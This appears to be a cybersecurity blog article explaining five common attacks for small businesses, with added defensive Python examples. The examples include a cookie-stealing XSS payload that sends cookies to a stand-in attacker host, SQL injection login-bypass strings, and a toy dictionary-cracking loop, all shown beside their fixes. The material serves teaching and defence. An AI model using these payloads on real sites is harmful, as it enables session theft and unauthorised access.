- Your systems could have been breached five years ago, and the hackers may be sitting there stealing your data every day. That is what happened in the Marriott Hotels breach: attackers had been inside the Starwood guest reservation system since 2014 and were only discovered in 2018, with Marriott announcing the breach in November 2018.
- Dr Ian Levy, technical director of the National Cyber Security Centre (the part of GCHQ responsible for cyber security), predicts that a massive cyber-attack, one that can only be countered by a government-level response, will hit us in the next few years. Such an attack would be far bigger than the 2017 WannaCry outbreak that disrupted the NHS and Deutsche Bahn, the German railway operator.
- Most hacking attacks are preventable, because they exploit well-known software vulnerabilities for which fixes already exist.
How are you protecting yourself in 2020?
UK cybersecurity and penetration testing provider Bulletproof discussed the current threat landscape in its Annual Cyber Security Report 2019 and showed that most attacks exploit the same software vulnerabilities they did last year and the year before.
Let’s look at these five attack modes in plain English:
Attack #1 – Unpatched software
Software is expensive and you have every right to expect it to be perfect. It isn’t, and it never will be.
Software companies release patches and updates as they discover security issues in the current version of their products. This happens even with programs like Microsoft Office®, WordPress® and Google’s Chrome® browser. Large software companies release patches frequently because they have the resources to fix the faulty code that created the problem; small companies with fewer resources may be slower to release fixes.
The big problem is at the user end, where customers treat computer programs like a kitchen appliance: use it until it stops working, then replace it with the latest version.
Installing updates is time-consuming and runs counter to the “if it ain’t broke, don’t fix it” philosophy many businesses have. Consequently, many companies keep using the original software because it appears to be working perfectly, whereas in reality hackers may be coming in and out of your computer like bargain-hunters at Walmart. Worse, once a patch is published, attackers compare the patched and unpatched versions to work out exactly what was fixed, so a vulnerability that was obscure yesterday can be exploited at scale within days of its fix being released.
Attack #2 – Cryptojacking
Cryptojacking is where hackers use your computers to mine cryptocurrency. The hacker pays none of the electricity costs and none of the hardware wear, and uses your resources to earn Monero or other cryptocurrencies.
What harm does cryptojacking do? It increases your electricity bill, slows down your machines and shortens their life. It also proves that an attacker can run code of their choosing on your systems, which is the real warning sign.
One of your users might visit a website carrying a malicious script. That script either mines in the browser for as long as the page is open or drops a miner onto the machine; from that moment on, part of that machine’s CPU is working for the cryptojacker, earning them virtual currency.
How can you fight crypto jacking?
- Look out for slow-running computers, or fans running flat out when a machine should be idle
- Watch outbound network traffic for connections to mining pools
- Install anti-malware software
- Educate employees
- Install updates and patches as soon as they are available
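Catching cryptojacking from the network side comes down to spotting miner-to-pool traffic in egress logs. The script below is an added example, not code from the page or from Bulletproof: it scores constructed proxy log lines against a small set of weighted indicators (the Stratum mining protocol, a miner’s login message, a browser mining script, pool-style hostnames and the ports pools commonly listen on) and flags a source only when the evidence adds up. The log format, hostnames, weights and threshold are all assumptions for the example and would need tuning to a real environment.

```python
import re
from collections import defaultdict

# Constructed egress-proxy log lines for this example (not real traffic).
# Assumed format: "<timestamp> <src_ip> <dst_host>:<dst_port> <request or payload>"
SAMPLE_LOG = """\
2020-01-14T09:12:03Z 10.0.1.22 www.example.com:443 GET /index.html
2020-01-14T09:12:07Z 10.0.1.22 cdn.example.net:443 GET /assets/coinhive.min.js
2020-01-14T09:13:41Z 10.0.1.35 pool.xmr-example.test:3333 stratum+tcp://pool.xmr-example.test:3333
2020-01-14T09:13:42Z 10.0.1.35 pool.xmr-example.test:3333 {"method":"login","params":{"agent":"XMRig/5.5.0"}}
2020-01-14T09:14:10Z 10.0.1.40 mail.example.com:993 IMAP STARTTLS
2020-01-14T09:15:02Z 10.0.1.51 api.example.org:3333 GET /v1/status
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<host>[^:\s]+):(?P<port>\d+) (?P<rest>.*)$"
)

# Weighted indicators. Patterns and weights are illustrative assumptions; a port
# on its own is weak evidence (legitimate services use 3333 too), so it scores low.
MINING_PORTS = {3333, 4444, 5555, 7777, 14444}
INDICATORS = [
    (3, "stratum mining protocol",
     lambda e: re.search(r"stratum\+(tcp|ssl)://", e["rest"], re.I)),
    (3, "miner login / user-agent",
     lambda e: re.search(r'"method"\s*:\s*"login"|xmrig', e["rest"], re.I)),
    (2, "browser mining script",
     lambda e: re.search(r"coinhive|cryptonight|\bminer\.js\b", e["rest"], re.I)),
    (1, "common mining-pool port",
     lambda e: int(e["port"]) in MINING_PORTS),
    (1, "mining-pool style hostname",
     lambda e: re.search(r"\b(xmr|monero|pool)\b", e["host"], re.I)),
]
THRESHOLD = 2


def parse_line(line):
    """Split one log line into its fields, or return None if it does not parse."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def score_entry(entry):
    """Sum the weights of every indicator that fires; return (score, reasons)."""
    score, reasons = 0, []
    for weight, label, test in INDICATORS:
        if test(entry):
            score += weight
            reasons.append(label)
    return score, reasons


def scan_log(text, threshold=THRESHOLD):
    """Return {src_ip: [(dst, score, reasons), ...]} for lines at or above threshold."""
    hits = defaultdict(list)
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        score, reasons = score_entry(entry)
        if score >= threshold:
            hits[entry["src"]].append((f'{entry["host"]}:{entry["port"]}', score, reasons))
    return dict(hits)


if __name__ == "__main__":
    for src, events in scan_log(SAMPLE_LOG).items():
        for dst, score, reasons in events:
            print(f"{src} -> {dst}  score={score}  ({', '.join(reasons)})")
```

Run against the sample, the two hosts talking to the pool and loading the mining script are reported, while the machine that merely contacts an API on port 3333 is not: scoring rather than single-pattern matching is what keeps the false-positive rate tolerable. A CPU check on the flagged endpoints is the natural next step.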
Attack #3 – Cross Site Scripting (XSS)
Cross-site scripting happens when a website copies text supplied by one user (a comment, a search term, a profile name) into its pages without escaping it, so that a script hidden in that text runs in other visitors’ browsers, where it can steal their session cookies or act on their behalf. The fix is escaping output for the context it lands in, which requires specialist knowledge to implement, so here’s the plain English version:
- Use a content management system such as WordPress or Drupal, whose core code already handles escaping
- Only install plugins from reputable companies, because plugins are often the open door for XSS. Update all plugins as soon as an update is offered, and be wary of free plugins, which are often slower to be patched.
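To make the “escaping” step concrete, here is an added example (not code from the page or from any CMS) that renders a constructed blog comment two ways: pasted straight into HTML, and escaped with Python’s standard `html.escape`. Rather than grepping the output for `<script>`, it parses both renderings with the standard library’s `HTMLParser`, which sees the markup roughly as a browser would, and reports any script element or `on*` event-handler attribute. The attacker payloads, the `render_comment_*` functions and the `ActiveContentFinder` class are all assumptions for the example.

```python
import html
from html.parser import HTMLParser

# Constructed attacker input (example payloads, not taken from a real site).
# The body carries a script; the display name breaks out of a quoted attribute.
ATTACKER_COMMENT = '<script>document.location="https://attacker.test/?c="+document.cookie</script>'
ATTACKER_NAME = '" autofocus onfocus="alert(document.cookie)'


def render_comment_vulnerable(author, body):
    """The pattern behind most XSS: user text concatenated straight into HTML."""
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'


def render_comment_safe(author, body):
    """Escape for the context the value lands in. html.escape() with quote=True
    encodes &, <, >, " and ', which covers element text and quoted attributes."""
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(body, quote=True)}</p></div>')


class ActiveContentFinder(HTMLParser):
    """Walk the markup the way a browser's parser would and record anything
    that executes: <script> elements and on* event-handler attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.findings.append(f"{name} event handler")
        if tag.lower() == "script":
            self.findings.append("script element")


def find_active_content(rendered):
    """Return the list of executable things a browser would find in `rendered`."""
    finder = ActiveContentFinder()
    finder.feed(rendered)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for label, render in (("vulnerable", render_comment_vulnerable),
                          ("escaped", render_comment_safe)):
        out = render(ATTACKER_NAME, ATTACKER_COMMENT)
        print(f"{label}: {find_active_content(out) or 'nothing executable'}")
        print(f"  {out}")
```

The escaped version is inert because the quote that would have closed the attribute arrives as `&quot;` and the angle brackets of the script tag as `&lt;` and `&gt;`. Note that `html.escape` is only correct for element text and quoted attribute values; a value dropped into a URL, a JavaScript string or a CSS rule needs the encoder for that context, which is why the advice above is to lean on a CMS or templating engine that already knows the difference.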
Attack #4 – Poor Passwords
Passwords make life difficult. It is much easier to use the same password everywhere you go, or to keep the default password if one exists. Don’t do it.
If hackers obtain the passwords from one site, they will sell the list, because many users do reuse the same password everywhere they go, and the list will then be tried against other sites.
Hackers routinely try simple passwords such as “password” or “123456”, and have programs that try every word in the dictionary, along with the usual variations such as a capital first letter and a few digits or a “!” on the end.
A good password is long and random, and includes numbers, special symbols, and upper and lower case letters. Two more criteria are rarely met: it must be unique to each site, and it must not be written down where others can find it. Forcing a change every week, on the other hand, is no longer recommended (the NCSC advises against routine password expiry, because it pushes people towards predictable variations of the old password); change a password when you have reason to think it has been exposed.
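The two attacks described above, guessing common passwords and running a dictionary with variations, are easy to demonstrate. The following is an added example, not code from the page or from Bulletproof: a `check_password` policy check that rejects short, single-class, common or dictionary-plus-suffix passwords, and a `dictionary_attack` that shows why “Password123!” falls in a handful of guesses even though it satisfies the usual complexity rules. The eight-entry wordlist is a constructed stand-in for the multi-million-entry lists attackers actually use, and the policy thresholds are assumptions. Plain SHA-256 is used only to simulate the guess-and-compare loop; real systems store passwords with a slow, salted hash.

```python
import hashlib
import secrets
import string

# Constructed mini wordlist standing in for real attacker wordlists (assumption).
WORDLIST = ["password", "123456", "qwerty", "letmein", "welcome", "monkey", "dragon", "football"]
COMMON = set(WORDLIST)

# Suffixes and case variants attackers bolt onto dictionary words (illustrative subset).
SUFFIXES = ("", "1", "123", "!", "123!", "2020")


def check_password(pw):
    """Return the list of reasons `pw` is weak; an empty list means it passes."""
    problems = []
    if len(pw) < 12:
        problems.append("shorter than 12 characters")
    classes = [any(c.islower() for c in pw), any(c.isupper() for c in pw),
               any(c.isdigit() for c in pw), any(c in string.punctuation for c in pw)]
    if sum(classes) < 3:
        problems.append("uses fewer than three character classes")
    if pw.lower() in COMMON:
        problems.append("appears in the common-password list")
    # Strip trailing digits/symbols: "Password123!" is really just "password".
    stripped = pw.lower().rstrip(string.digits + "!@#$%")
    if stripped != pw.lower() and stripped in COMMON:
        problems.append("is a dictionary word with digits/symbols appended")
    return problems


def sha256_hex(pw):
    """Fast hash used only to simulate a guess-and-compare loop (not for storage)."""
    return hashlib.sha256(pw.encode("utf-8")).hexdigest()


def dictionary_attack(target_hash, wordlist=WORDLIST, suffixes=SUFFIXES):
    """Try each word with common case and suffix variants, as a cracking tool would.
    Returns the recovered password, or None if the wordlist does not contain it."""
    for word in wordlist:
        for variant in (word, word.capitalize(), word.upper()):
            for suffix in suffixes:
                candidate = variant + suffix
                if sha256_hex(candidate) == target_hash:
                    return candidate
    return None


def generate_password(length=16):
    """Random password from the OS CSPRNG: the kind a password manager produces."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    for pw in ("letmein", "Password123!", "Vq7!mZ2#pL9@xR4t"):
        print(f"{pw!r}: {check_password(pw) or 'passes policy'}")
        print(f"  dictionary attack recovers: {dictionary_attack(sha256_hex(pw))}")
    print("generated:", generate_password())
```

The point of the third test password is that a random 16-character string passes every check and is not recoverable from any wordlist, which is exactly why a password manager is the practical way to meet the “unique and random” criteria.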
Attack #5 – SQL Injection
Structured Query Language (SQL) is used to create and query databases. Your website and company databases are very attractive targets for hackers, and many applications are built with sloppy code that pastes user input straight into SQL statements, which lets hackers read or change your data.
If you have a WordPress website, a pro-level security plugin will block many common SQL injection attacks, but it is a filter in front of your code, not a fix for it; the real fix is to use parameterised queries (prepared statements) so that user input is never parsed as SQL.
Minimise the damage an injection can do by giving the database account your website uses the lowest level of permission it needs, and by allow-listing authorised users (denying everyone not on the list).
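The difference between sloppy and safe database code fits in a few lines. Below is an added example, not code from the page or from any CMS: an in-memory SQLite database with a constructed `users` table, a login check that builds its query by string formatting, and the same check written with a parameterised query. The table contents, the `login_*` function names and the attack strings are assumptions for the example; passwords are stored in clear here only so the injection is visible, which is not how a real application should store them.

```python
import sqlite3


def setup_db():
    """In-memory database with a constructed users table (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "S3cret!", "admin"), ("bob", "hunter2", "editor")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by formatting user input into it, so the input is
    parsed as SQL. Returns (username, role) on 'success', else None."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Parameterised query: the driver binds the values after the statement has
    been parsed, so a quote or comment marker in the input is just data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# Constructed attack strings (classic injection payloads, shown for illustration).
COMMENT_OUT_PASSWORD = "alice' --"      # closes the string, comments out the rest
ALWAYS_TRUE = "' OR '1'='1' --"          # matches every row, first one is returned


if __name__ == "__main__":
    conn = setup_db()
    for name, fn in (("vulnerable", login_vulnerable), ("parameterised", login_safe)):
        print(f"{name}:")
        print("  genuine login   ->", fn(conn, "alice", "S3cret!"))
        print("  alice' --       ->", fn(conn, COMMENT_OUT_PASSWORD, "wrong"))
        print("  ' OR '1'='1' -- ->", fn(conn, ALWAYS_TRUE, "wrong"))
```

With the vulnerable function the attacker logs in as alice without her password, because the query that actually runs is `... WHERE username = 'alice' --' AND password = 'wrong'` and everything after `--` is a comment. The parameterised version runs the statement the developer wrote, with the odd-looking username compared literally, and finds no such user. This is also where the least-privilege advice bites: if the account the website connects with can only read the tables it needs, even a successful injection cannot drop or rewrite them.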
Most attacks use the same old vulnerabilities they always have. They work, so why would attackers go looking for new ways in?
What can you do? Update all your software every time a new patch is released, use a CMS with only premium, well-maintained plugins, install a security plugin, and enforce unique, strong passwords rather than routine password changes. When you have all the simple DIY measures in place, consider investing a few thousand pounds in having a cyber-security company test your defences.